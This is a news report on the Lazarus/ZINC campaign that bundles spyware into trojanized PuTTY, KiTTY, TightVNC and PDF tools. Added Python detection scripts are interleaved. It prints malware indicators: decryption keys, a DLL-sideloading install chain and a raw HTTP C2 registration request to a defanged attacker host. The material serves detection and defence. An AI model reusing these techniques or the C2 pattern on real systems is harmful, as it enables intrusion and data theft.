Many organizations hacked after installing weaponized open source apps



North Korean government-backed hackers are weaponizing well-known open-source software in an ongoing campaign that has already successfully compromised “many” organizations in media, defense, aerospace and IT services, Microsoft said Thursday.

ZINC, the name Microsoft gives to a group of threat actors also known as Lazarus, which is best known for the devastating 2014 compromise of Sony Pictures Entertainment, bundled PuTTY and other legitimate open-source applications with heavily encrypted code that ultimately installs spyware.

The attackers pose as job recruiters and approach individuals at targeted organizations via LinkedIn. After building trust over a series of conversations and eventually moving the targets to WhatsApp messaging, they ask them to install the apps, which then infect the employees’ work environments.


“Actors have successfully compromised numerous organizations since June 2022,” members of the Microsoft Security Threat Intelligence and LinkedIn Threat Prevention and Defense teams wrote in a post. “Due to the widespread use of the platforms and software that ZINC is using in this campaign, ZINC could pose a significant threat to individuals and organizations across multiple industries and regions.”

PuTTY is a popular terminal emulator, serial console, and network file transfer application that supports network protocols including SSH, SCP, Telnet, rlogin, and raw socket connections. Two weeks ago, security firm Mandiant warned that hackers with ties to North Korea had trojanized it in a campaign that successfully compromised a customer’s network. Thursday’s post says the same hackers have also weaponized KiTTY, TightVNC, Sumatra PDF Reader and the muPDF/Subliminal Recording installer with code that installs the same spyware, which Microsoft has named ZetaNile.

Lazarus was once a ragtag group of hackers with only marginal resources and skills. Over the past decade, its prowess has increased dramatically. Its attacks on cryptocurrency exchanges over the past five years have generated billions of dollars for the nation’s weapons of mass destruction programs. Members routinely find and exploit zero-day vulnerabilities in heavily hardened applications and use many of the same malware techniques as other state-sponsored groups.

The group relies primarily on spear phishing as its initial access vector, but it also sometimes uses other forms of social engineering and website compromises. A common theme is that members target employees of organizations they want to compromise, often by tricking or coercing them into installing trojanized software.

The trojanized PuTTY and KiTTY applications Microsoft observed use a clever mechanism to ensure that only intended targets are infected and that the apps don’t inadvertently infect anyone else. The installers themselves execute no malicious code. Instead, the ZetaNile malware is installed only when the apps connect to a specific IP address using login credentials that the fake recruiters give to targets.

The trojanized PuTTY executable uses a technique called DLL search order hijacking, which loads and decrypts a second-stage payload when presented with the key “0CE1241A44557AA438F27BC6D4ACA246”; that payload is then used for command and control. Once it successfully connects to the C2 server, the attackers can install additional malware on the compromised device. The KiTTY app works the same way.

Similarly, the malicious TightVNC viewer installs its final payload only when a user selects ec2-aet-tech.w-ada[.]amazonaws from the prepopulated remote hosts drop-down menu in the TightVNC viewer.
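The DLL search order hijack described above leaves a host-side trace: a well-known executable loads a DLL from its own directory that Windows normally serves from System32. The following detection heuristic is an added example, not code from Microsoft or the article. The records are constructed to resemble Sysmon Event ID 7 (ImageLoad) fields, and the DLL names are an illustrative assumption, since the page does not name the hijacked DLL.

```python
"""Heuristic for the DLL search-order hijack the article describes: a
well-known tool such as putty.exe loads a DLL from its own directory that
Windows normally serves from System32.

Added example, not code from Microsoft or the article. The records below
are constructed to resemble Sysmon Event ID 7 (ImageLoad) fields, and the
DLL names are an illustrative assumption; the page does not name the
hijacked DLL.
"""
from pathlib import PureWindowsPath
from typing import Optional

# Executables the campaign is known to trojanize (named in the article).
WATCHED_IMAGES = {"putty.exe", "kitty.exe", "tvnviewer.exe"}

# A small set of DLLs Windows ships in System32; a copy of one of these
# beside the EXE is the classic search-order hijack position. (Assumption:
# build the real list from your own System32 baseline.)
SYSTEM32_DLLS = {"version.dll", "dwmapi.dll", "cryptbase.dll",
                 "uxtheme.dll", "winmm.dll"}


def is_system_dir(path: str) -> bool:
    """True if the path lives under C:\\Windows\\System32 or SysWOW64."""
    parts = [p.lower() for p in PureWindowsPath(path).parts]
    return (len(parts) >= 3 and parts[1] == "windows"
            and parts[2] in ("system32", "syswow64"))


def flag_sideload(event: dict) -> Optional[dict]:
    """Return a finding for one ImageLoad record, or None if it looks benign."""
    image = PureWindowsPath(event["Image"])
    loaded = PureWindowsPath(event["ImageLoaded"])
    if image.name.lower() not in WATCHED_IMAGES:
        return None
    if loaded.name.lower() not in SYSTEM32_DLLS:
        return None
    if is_system_dir(str(loaded)):
        return None  # resolved from the system directory: expected
    reasons = []
    # PureWindowsPath compares case-insensitively, as Windows does.
    if loaded.parent == image.parent:
        reasons.append("loaded from the executable's own directory")
    if event.get("Signed", "false").lower() != "true":
        reasons.append("DLL is unsigned")
    if not reasons:
        return None  # signed copy elsewhere on disk: not enough to flag
    return {"image": str(image), "dll": str(loaded), "reasons": reasons}


def scan(events) -> list:
    """Run flag_sideload over a batch of records and keep the findings."""
    return [hit for hit in (flag_sideload(e) for e in events) if hit]


# Constructed sample records, not real telemetry.
SAMPLE_EVENTS = [
    # Stock PuTTY resolving version.dll from System32: benign.
    {"Image": r"C:\Program Files\PuTTY\putty.exe",
     "ImageLoaded": r"C:\Windows\System32\version.dll", "Signed": "true"},
    # "Recruiter" copy of PuTTY loading an unsigned version.dll beside itself.
    {"Image": r"C:\Users\jdoe\Downloads\putty.exe",
     "ImageLoaded": r"C:\Users\jdoe\Downloads\version.dll", "Signed": "false"},
    # KiTTY loading winmm.dll from its own folder: flagged on location alone.
    {"Image": r"C:\Tools\kitty.exe",
     "ImageLoaded": r"C:\Tools\winmm.dll", "Signed": "true"},
    # Not a watched image: ignored even though the load looks odd.
    {"Image": r"C:\Apps\editor.exe",
     "ImageLoaded": r"C:\Apps\dwmapi.dll", "Signed": "false"},
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(hit["image"], "->", hit["dll"], "|", "; ".join(hit["reasons"]))
```

The location test does the real work here: a DLL with a System32 name sitting next to the executable is suspicious regardless of signature, while a signed copy elsewhere on disk is left alone to keep false positives down.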


Thursday’s post continued:

The trojanized version of Sumatra PDF Reader, named SecurePDF.exe, has been used by ZINC since at least 2019 and remains a unique piece of ZINC tradecraft. SecurePDF.exe is a modular loader that can install the ZetaNile implant by loading a weaponized job-application-themed file with a .PDF extension. The fake PDF contains an “SPV005” header, a decryption key, an encrypted second-stage implant payload, and an encrypted decoy PDF, which is rendered in the Sumatra PDF reader when the file is opened.

Once loaded into memory, the second-stage malware is configured to send the victim’s system hostname and device information, using custom encryption algorithms, to a C2 server as part of the C2 registration process. Attackers can then install additional malware on compromised devices over the C2 channel if needed.
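The SecurePDF.exe lure described above gives a file-level triage hook: a file with a .PDF extension that does not begin with the %PDF- magic and instead carries the “SPV005” header, followed by encrypted (high-entropy) content. The following check is an added example, not code from Microsoft or the article. The page does not describe the container layout beyond that header, so the function only tests the missing magic, the marker near the start of the file (an assumed position) and the entropy of the remainder; the sample bytes are constructed.

```python
"""Triage for the SecurePDF.exe lure: a .PDF file without the %PDF- magic
that carries the SPV005 header and an encrypted body.

Added example, not Microsoft's or the article's code. Layout beyond the
header is not described on the page, so this checks only the magic, the
marker (assumed to sit in the first 64 bytes) and the body entropy.
"""
import math
import random
from collections import Counter

PDF_MAGIC = b"%PDF-"
SPV_MARKER = b"SPV005"
HEADER_WINDOW = 64        # assumption: marker appears near the start
HIGH_ENTROPY = 7.5        # bits/byte; encrypted data sits close to 8


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte for the given buffer (0.0 for empty input)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def classify_pdf(name: str, data: bytes) -> dict:
    """Return a verdict plus the entropy of everything after the header window."""
    body_entropy = shannon_entropy(data[HEADER_WINDOW:])
    if not name.lower().endswith(".pdf"):
        verdict = "not-pdf-extension"
    elif data.startswith(PDF_MAGIC):
        verdict = "pdf"
    elif SPV_MARKER in data[:HEADER_WINDOW]:
        # Marker present and body encrypted: matches the lure description.
        verdict = "spv005-lure" if body_entropy > HIGH_ENTROPY else "spv005-marker"
    else:
        verdict = "bad-magic"
    return {"name": name, "verdict": verdict, "entropy": round(body_entropy, 3)}


# Constructed samples. A seeded PRNG stands in for ciphertext so the
# example is deterministic; no real key or payload is involved.
_rng = random.Random(1)
LURE = SPV_MARKER + b"\x00" * 10 + bytes(_rng.randrange(256) for _ in range(4096))
BENIGN = b"%PDF-1.7\n1 0 obj\n<< /Type /Catalog >>\nendobj\n" + b"plain text " * 200

if __name__ == "__main__":
    for fname, blob in (("resume.pdf", LURE), ("resume.pdf", BENIGN)):
        print(classify_pdf(fname, blob))
```

The entropy threshold separates an encrypted blob from a decoy that happens to carry an odd header; tune it against your own corpus, since compressed PDF streams can also score high.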


The post continued:

In the trojanized version of the muPDF/Subliminal Recording installer, setup.exe is configured to check whether the file path ISSetupPrerequisites\Setup64.exe exists and to write C:\colrctl\colorui.dll to disk after extracting the executable embedded inside setup.exe. It then copies C:\Windows\System32\ColorCpl.exe to C:\ColorCtrl\ColorCpl.exe. For the second-stage malware, the malicious installer creates a new process, C:\colorctrl\colorcpl.exe C3A9B30B6A313F289297C9A36730DB6D, and the argument C3A9B30B6A313F289297C9A36730DB6D is passed to colorui.dll as a decryption key. The DLL colorui.dll, which Microsoft tracks as the EventHorizon malware family, is injected into C:\Windows\System\credwiz.exe or iexpress.exe to send HTTP C2 requests as part of the victim registration process and to fetch an additional payload.

POST /support/support.asp HTTP/1.1
Cache-Control: no-cache
Connection: close
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64;
Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729;
InfoPath.3; .NET4.0C; .NET4.0E)
Content-Length: 125
Host: www.elite4print[.]com

bb=[encrypted payload]=&items=[encrypted payload]
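The installer chain and the registration request above give two concrete things to look for: a colorcpl.exe copy launched from outside System32 with a 32-hex-character key on its command line, and an HTTP POST to /support/support.asp with the bb and items form fields. The following detection logic is an added example, not code from Microsoft or the article. The process record and the request are constructed samples (the form values are placeholder base64, not real payloads), the host name is spelled out only so the string match works offline, and nothing here touches the network.

```python
"""Detection logic for two EventHorizon indicators quoted above: the
colorcpl.exe launch carrying a 32-hex-character decryption key on its
command line, and the C2 registration POST to /support/support.asp.

Added example, not code from Microsoft or the article. The process record
and the HTTP request below are constructed samples (form values are
placeholder base64), and nothing here performs network access.
"""
import re
from pathlib import PureWindowsPath
from urllib.parse import parse_qs

HEX_KEY = re.compile(r"^[0-9A-Fa-f]{32}$")   # e.g. C3A9B30B6A313F289297C9A36730DB6D
C2_HOSTS = {"www.elite4print.com"}            # defanged as [.] in the article
C2_PATH = "/support/support.asp"
SYSTEM32 = PureWindowsPath(r"C:\Windows\System32")


def check_process_create(event: dict) -> list:
    """Indicator names matched by one process-creation record (Sysmon ID 1 style)."""
    image = PureWindowsPath(event["Image"])
    # Assumption: the image path contains no spaces, so a plain split suffices.
    args = event.get("CommandLine", "").split()
    hits = []
    if image.name.lower() == "colorcpl.exe" and image.parent != SYSTEM32:
        hits.append("colorcpl.exe outside System32")
    if len(args) == 2 and HEX_KEY.match(args[1]):
        hits.append("32-hex-char argument (decryption key)")
    return hits


def parse_http_request(raw: str):
    """Split a raw request into (method, path, headers, body); header names lowercased."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def check_http(raw: str) -> list:
    """Indicator names matched by one captured request, strongest first."""
    method, path, headers, body = parse_http_request(raw)
    hits = []
    if headers.get("host", "").lower() in C2_HOSTS:
        hits.append("known C2 host")
    if method == "POST" and path == C2_PATH:
        hits.append("C2 registration path")
    if set(parse_qs(body, keep_blank_values=True)) == {"bb", "items"}:
        hits.append("bb/items form fields")
    if headers.get("user-agent", "").startswith("Mozilla/4.0 (compatible; MSIE 7.0;"):
        hits.append("MSIE 7.0 user-agent")  # weak on its own: legacy, not unique
    return hits


# Constructed samples, not real telemetry.
SAMPLE_PROCESS = {
    "Image": r"C:\colorctrl\colorcpl.exe",
    "CommandLine": r"C:\colorctrl\colorcpl.exe C3A9B30B6A313F289297C9A36730DB6D",
}
BENIGN_PROCESS = {
    "Image": r"C:\Windows\System32\colorcpl.exe",
    "CommandLine": r"C:\Windows\System32\colorcpl.exe",
}
SAMPLE_REQUEST = (
    "POST /support/support.asp HTTP/1.1\r\n"
    "Cache-Control: no-cache\r\n"
    "Connection: close\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Accept: */*\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/4.0)\r\n"
    "Host: www.elite4print.com\r\n"
    "\r\n"
    "bb=Q29uc3RydWN0ZWQ=&items=c2FtcGxl"
)

if __name__ == "__main__":
    print("process:", check_process_create(SAMPLE_PROCESS))
    print("http:", check_http(SAMPLE_REQUEST))
```

The user-agent and the bare form-field shape are listed last because either can appear in legitimate traffic; treat them as corroboration for the host and path matches rather than as standalone alerts.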

The post provides technical indicators that organizations can use to determine whether endpoints inside their networks are infected. It also includes the IP addresses used in the campaign, which administrators can add to their network blocklists.

